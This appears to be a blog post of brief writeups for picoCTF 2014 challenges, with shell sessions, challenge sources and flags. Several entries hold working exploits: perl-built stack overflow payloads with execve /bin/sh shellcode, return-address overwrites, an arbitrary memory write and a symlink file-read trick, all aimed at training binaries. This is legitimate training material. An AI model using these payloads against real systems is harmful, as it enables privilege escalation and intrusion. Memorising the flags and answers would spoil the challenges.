Hello! Today I'm going to write simple writeups(without reasonings) to wrap-up what I've solved in the picoctf2014. Please feel free to ask questions for specific problems/reasonings in the comments. Hope you enjoy.
Tyrannosaurus Hex - 10
No Comment - 20
Chrome right click, click inspect element;
"<!-- In case you forget, the password for this site is: flag_bf207f2786e38ceb49fa66d36f996d5ac2cbfd6b -->"
Common Vulnerability Exercise - 20
Caesar - 20
vjgugetgvrcuurjtcugkudnekgavqkpsqvzvihlvwmrwbpqtiha
go to http://nayuki.eigenstate.org/page/automatic-caesar-cipher-breaker-javascript
click break code! after entering the message.
thesecretpassphraseisblcieytoinqotxtgfjtukpuznorgfy
The Valley of Fear - 20
Internet Inspection - 30
RoboPhoto - 30
This is the Endian - 40
Supercow - 40
/home/daedalus/supercow
. Can you figure out how to get it to print out the flag?Simply symbolic link the txt file into cow file.
pico19855@shell:~$ cd /home/daedalus
pico19855@shell:/home/daedalus$ ls
flag.txt hint.cow secret1.cow secret2.cow supercow supercow.c
pico19855@shell:/home/daedalus$ ./supercow secret1.cow
____________
< cow_text_1 >
------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
pico19855@shell:/home/daedalus$ ln -s flag.txt /home_users/pico19855/asdf.cow
pico19855@shell:/home/daedalus$ ./supercow /home_users/pico19855/asdf.cow
______________
< I_LOV_BNANAS >
--------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
Grep is Still Your Friend - 40
daedaluscorp.txt.enc
. The file is stored on the shell server at /problems/grepfriend/keys.
Grep it.
pico19855@shell:/home/daedalus$ cd /problems/grepfriend
pico19855@shell:/problems/grepfriend$ grep "daedaluscorp.txt.enc" *
daedaluscorp.txt.enc b2bee8664b754d0c85c4c0303134bca6
pico19855@shell:/problems/grepfriend$
Javascrypt - 40
alert(key); on your javascript console. (The key differs.)
The page at https://picoctf.com says: flag_3645
Easy Overflow - 40
nc vuln2014.picoctf.com 50000
'nc' is the Linux netcat command. Try running it in the shell.
If an integer overflows, it becomes negative.
pico19855@shell:~$ nc vuln2014.picoctf.com 50000
Your number is 1712058. Can you make it negative by adding a positive integer?
2145771590
Congratulations! The sum is -2147483648. Here is the flag: That_was_easssy!
Write Right - 50
/home/write_right/
on the shell server. The source can be found here.pico19855@shell:/home/write_right$ cat write_right.c
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
unsigned secret = 0xdeadbeef;
int main(int argc, char **argv){
unsigned *ptr;
unsigned value;
char key[33];
FILE *f;
printf("Welcome! I will grant you one arbitrary write!\n");
printf("Where do you want to write to? ");
scanf("%p", &ptr);
printf("Okay! What do you want to write there? ");
scanf("%p", (void **)&value);
printf("Writing %p to %p...\n", (void *)value, (void *)ptr);
*ptr = value;
printf("Value written!\n");
if (secret == 0x1337beef){
printf("Woah! You changed my secret!\n");
printf("I guess this means you get a flag now...\n");
f = fopen("flag.txt", "r");
fgets(key, 32, f);
fclose(f);
puts(key);
exit(0);
}
printf("My secret is still safe! Sorry.\n");
}
pico19855@shell:/home/write_right$ gdb -q write_right
Reading symbols from write_right...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
0x080485cd <+0>: push %ebp
<cont..>
0x0804865b <+142>: movl $0x8048831,(%esp)
0x08048662 <+149>: call 0x8048470 <puts@plt>
0x08048667 <+154>: mov 0x804a03c,%eax //address of variable 'secret'-overwrite this.
0x0804866c <+159>: cmp $0x1337beef,%eax
<cont...>
0x080486fc <+303>: call 0x8048460 <__stack_chk_fail@plt>
0x08048701 <+308>: leave
0x08048702 <+309>: ret
End of assembler dump.
(gdb) x/wx 0x804a03c
0x804a03c <secret>: 0xdeadbeef
(gdb) q
pico19855@shell:/home/write_right$ ./write_right
Welcome! I will grant you one arbitrary write!
Where do you want to write to? 0x804a03c
Okay! What do you want to write there? 1337beef
Writing 0x1337beef to 0x804a03c...
Value written!
Woah! You changed my secret!
I guess this means you get a flag now...
arbitrary_write_is_always_right
pico19855@shell:/home/write_right$
Overflow 1 - 50
#include <stdio.h>#include <stdlib.h>#include <string.h>void give_shell(){gid_t gid = getegid();setresgid(gid, gid, gid);system("/bin/sh -i");}void vuln(char *input){char buf[16];int secret = 0;strcpy(buf, input);if (secret == 0xc0deface){give_shell();}else{printf("The secret is %x\n", secret);}}int main(int argc, char **argv){if (argc > 1)vuln(argv[1]);return 0;}pico19855@shell:/home/overflow1$ lsflag.txt Makefile overflow1 overflow1.cpico19855@shell:/home/overflow1$ ./overflow1 `perl-e 'print "\x90"x16, "\xce\xfa\xde\xc0"'`$ cat flag.txtooh_so_critical
Toaster Control - 50
Toaster Defense System Controls
Shutting down
Shutdown code: flag_c49bdkeekr5zqgvc20vc
ZOR - 50
ZOR.py:
#!/usr/bin/python
import sys """ Daedalus Corporation encryption script. """ def xor(input_data, key): result = "" for ch in input_data: result += chr(ord(ch) ^ key) return result def encrypt(input_data, password): key = 0 for ch in password: key ^= ((2 * ord(ch) + 3) & 0xff) return xor(input_data, key) def decrypt(input_data, password): return encrypt(input_data, password) def usage(): print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0]) exit() def main(): if len(sys.argv) < 5: usage() input_data = open(sys.argv[2], 'r').read() result_data = "" if sys.argv[1] == "encrypt": result_data = encrypt(input_data, sys.argv[4]) elif sys.argv[1] == "decrypt": result_data = decrypt(input_data, sys.argv[4]) else: usage() out_file = open(sys.argv[3], 'w') out_file.write(result_data) out_file.close()
#!/usr/bin/python
input_data='Vjkq"ogqqceg"kq"dmp"Fcgfcnwq"Amprmpcvkml"mln{,"Mwp"`nwgrpklvq"dmp"vjg"A{`mpe"cpg"rpmvgavgf"ukvj"c"rcqqumpf,"Vjcv"rcqqumpf"kq":da0c251dc0gfffcd:f6a6`ca4c:`g'
password=[]
def xor(input_data, key):
result = ""
for ch in input_data:
result += chr(ord(ch) ^ key)
return result
for password in range (0,256):
result=xor(input_data, password)
print result + "\n"
tHISMESSAGEISFORdAEDALUScORPORATIONONLYoURBLUEPRINTSFORTHEcYBORGAREPROTECTEDWITHAPASSWORDtHATPASSWORDISFCAFAEDDDAFDCBACABE
Substitution - 50
encrypted.txt:
mid ofminzujomunc snvd ug kumiobbmidsnbnzgnwmidkucv ynf miucq ue oc ulcnzocm gotold ocv ynftd addc gn eocy xbosdg u lfdgg um efgm ad gn afm gmubb u soccnm gdd uw mid gotold ncd ug ed ink soc midzd ad gn efsi miom ynf vncm qcnk ynf vncm qcnk ynf miucq ynf nkc kiomdtdz bocv ynf bocv nc mid dozmi ug rfgm o vdov miucl ynf soc sboue afm u qcnk dtdzy znsq ocv mzdd ocv szdomfzd iog o buwd iog o gxuzum iog o coed ynf miucq mid ncby xdnxbd kin ozd xdnxbd ozd mid xdnxbd kin bnnq ocv miucq buqd ynf afm uw ynf kobq mid wnnmgmdxg nw o gmzocldz ynfbb bdozc miuclg ynf cdtdz qcdk ynf cdtdz qcdk iotd ynf dtdz idozv mid knbw szy mn mid abfd snzc ennc nz ogqdv mid lzuccucl anasom kiy id lzuccdv soc ynf gucl kumi obb mid tnusdg nw mid enfcmoucg soc ynf xoucm kumi obb mid snbnzg nw mid kucv soc ynf xoucm kumi obb mid snbnzg nw mid kucv sned zfc mid iuvvdc xucd mzoubg nw mid wnzdgm sned mogmd mid gfcgkddm adzzudg nw mid dozmi sned znbb uc obb mid zusidg obb oznfcv ynf ocv wnz ncsd cdtdz kncvdz kiom midyzd knzmi mid zoucgmnze ocv mid zutdz ozd ey aznmidzg mid idznc ocv mid nmmdz ozd ey wzudcvg ocv kd ozd obb snccdsmdv mn dosi nmidz uc o suzsbd uc o innx miom cdtdz dcvg ink iuli kubb mid gysoenzd lznk uw ynf sfm um vnkc midc ynfbb cdtdz qcnk ocv ynfbb cdtdz idoz mid knbw szy mn mid abfd snzc ennc wnz kidmidz kd ozd kiumd nz snxxdz gquccdv kd cddv mn gucl kumi obb mid tnusdg nw mid enfcmoucg kd cddv mn xoucm kumi obb mid snbnzg nw mid kucv ynf soc nkc mid dozmi ocv gmubb obb ynfbb nkc ug dozmi fcmub ynf soc xoucm kumi obb mid snbnzg nw mid kucv
I always use this site. Go there and paste the text above.
the authorization code is withallthecolorsofthewind
you think im an ignorant savage and youve been so many places i guess it must be so but still i cannot see if the savage one is me how can there be so much that you dont know you dont know you think you own whatever land you land on the earth is ~ust a dead thing you can claim but i know every rock and tree and creature has a life has a spirit has a name you think the only people who are people are the people who look and think like you but if you walk the footsteps of a stranger youll learn things you never knew you never knew have you ever heard the wolf cry to the blue corn moon or asked the grinning bobcat why he grinned can you sing with all the voices of the mountains can you paint with all the colors of the wind can you paint with all the colors of the wind come run the hidden pine trails of the forest come taste the sunsweet berries of the earth come roll in all the riches all around you and for once never wonder what theyre worth the rainstorm and the river are my brothers the heron and the otter are my friends and we are all connected to each other in a circle in a hoop that never ends how high will the sycamore grow if you cut it down then youll never know and youll never hear the wolf cry to the blue corn moon for whether we are white or copper skinned we need to sing with all the voices of the mountains we need to paint with all the colors of the wind you can own the earth and still all youll own is earth until you can paint with all the colors of the wind
Function Address - 60
Basic ASM - 60
# and http://en.wikipedia.org/wiki/X86_assembly_language#Syntax. Both gdb and objdump produce # AT&T syntax by default.
MOV $3187,%ebx //ebx=3187 MOV $26953,%eax //eax=26953 MOV $19902,%ecx //ecx=19902 CMP %eax,%ebx //compare eax and ebx JL L1 //Jump to L1 if ebx < eax JMP L2 //else jump to L2
L1: IMUL %eax,%ebx //ebx=eax*ebx, ebx=8539211 ADD %eax,%ebx //ebx+=eax, ebx=85926164 MOV %ebx,%eax //eax=ebx, eax=85926164 SUB %ecx,%eax //eax-=ecx, goto L3, eax=85906262 JMP L3
L2: IMUL %eax,%ebx //ebx=eax*ebx SUB %eax,%ebx //ebx+=eax MOV %ebx,%eax //eax=ebx ADD %ecx,%eax //eax-=ecx
L3:
NOP
Delicious! - 60
Welcome! You've been here before.
You're logged in as Dr. Florian Richards.
Today's secret Daedalus code is: session_cookies_are_the_most_delicious
Overflow 2 - 70
shell login: pico19855Password:pico19855@shell:/home/overflow2$ lsflag.txt Makefile overflow2 overflow2.cpico19855@shell:/home/overflow2$ gdb -q overflow2Reading symbols from overflow2...(no debugging symbols found)...done.(gdb) p give_shell$1 = {<text variable, no debug info>} 0x80484ad <give_shell>(gdb) qpico19855@shell:/home/overflow2$ ./overflow2 `perl-e 'print "\x90"x28, "\xad\x84\x04\x08"'`$ cat flag.txtcontrolling_%eip_feels_great
Cyborg Secrets - 80
/home/cyborgsecrets/cyborg-defense
or you can download it here.ZogHTODO: REMOVE DEBUG PASSWORD!DEBUG PASSWORD: 2manyHacks_Debug_Admin_Test____
<gibberish>
pico19855@shell:/home/cyborgsecrets$ ./cyborg_defense 2manyHacks_Debug_Admin_Test_______ _ _____| _ \ | | | | / __ \| | | |__ _ ___ __| | __ _| |_ _ ___ | / \/ ___ _ __ _ __| | | / _` |/ _ \/ _` |/ _` | | | | / __| | | / _ \| '__| '_ \| |/ / (_| | __/ (_| | (_| | | |_| \__ \ | \__/\ (_) | | | |_) ||___/ \__,_|\___|\__,_|\__,_|_|\__,_|___/ \____/\___/|_| | .__/| ||_|Password: 2manyHacks_Debug_Admin_TestAuthorization successful.403-shutdown-for-what
No Overflow - 140
/home/no_overflow/
on the shell server. The source can be found here.How to find where return address is: Start with about 260 bytes and make your way up until the eip gets changed. Thanks barrebas for answering some of my questions (as I solved this problem after the competition ended.)The program limits what you enter. However, if you use a negative number, it won't notice, and also won't set a limit to your inputs.Don't forget to ulimit -c unlimit in order to make a core file.pico19855@shell:~$ cat no_overflow.c#include <stdlib.h>#include <stdio.h>#include <unistd.h>#define BUFSIZE 256void greet(int length){char buf[BUFSIZE];puts("What is your name?");read(0, buf, length);printf("Hello, %s\n!", buf);}void be_nice_to_people(){gid_t gid = getegid();setresgid(gid, gid, gid);}int main(int argc, char **argv){int length;be_nice_to_people();puts("How long is your name?");scanf("%d", &length);if(length < BUFSIZE) //don't allow buffer overflowgreet(length);elseputs("Length was too long!");}
pico19855@shell:~$ (echo -1; perl -e 'print "\x90"x245, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\xd8\xd5\xff\xff"';cat)|./no_overflow
How long is your name?
What is your name?
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LC_CTYPE = "UTF-8",
LANG = "en_US.UTF-8"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
Hello, 1Ph//shh/binPS嘯
莽咽昶苔嚆
Segmentation fault (core dumped)
pico19855@shell:~$ gdb -q -c core
[New LWP 5132]
Core was generated by `./no_overflow'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffd6c5 in ?? ()
(gdb) x/40wx $esp-200
0xffffd5fc: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd60c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd61c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd62c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd63c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd64c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd65c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd66c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd67c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd68c: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb)
0xffffd69c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd6ac: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xffffd6bc: 0x622f6868 0xe3896e69 0x6e69622f 0x68732f2f
0xffffd6cc: 0x00000000 0xffffffff 0xffffd6ec 0xffffd79c
0xffffd6dc: 0xf7e4f39d 0xf7fc83c4 0xf7ffd000 0x0804860b
0xffffd6ec: 0xffffffff 0x08048600 0x00000000 0x00000000
0xffffd6fc: 0xf7e35a83 0x00000001 0xffffd794 0xffffd79c
0xffffd70c: 0xf7feacea 0x00000001 0xffffd794 0xffffd734
0xffffd71c: 0x0804a020 0x0804826c 0xf7fc8000 0x00000000
0xffffd72c: 0x00000000 0x00000000 0x1588b43a 0x2c92302a
(gdb) q
pico19855@shell:~$ cd /home/no_overflow
pico19855@shell:/home/no_overflow$ (echo -1; perl -e 'print "\x90"x200, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\x90"x45, "\xfc\xd5\xff\xff"';cat)|./no_overflow
How long is your name?
What is your name?
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LC_CTYPE = "UTF-8",
LANG = "en_US.UTF-8"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
Hello, 1Ph//shh/binPS嘯
莽擎|昶苔嚆
ls
Makefile core flag.txt no_overflow no_overflow.c
cat flag.txt
'CTF > picoCTF' 카테고리의 다른 글
picoCTF 2018 writeup (1) | 2019.02.05 |
---|---|
picoCTF 2013 (0) | 2014.06.27 |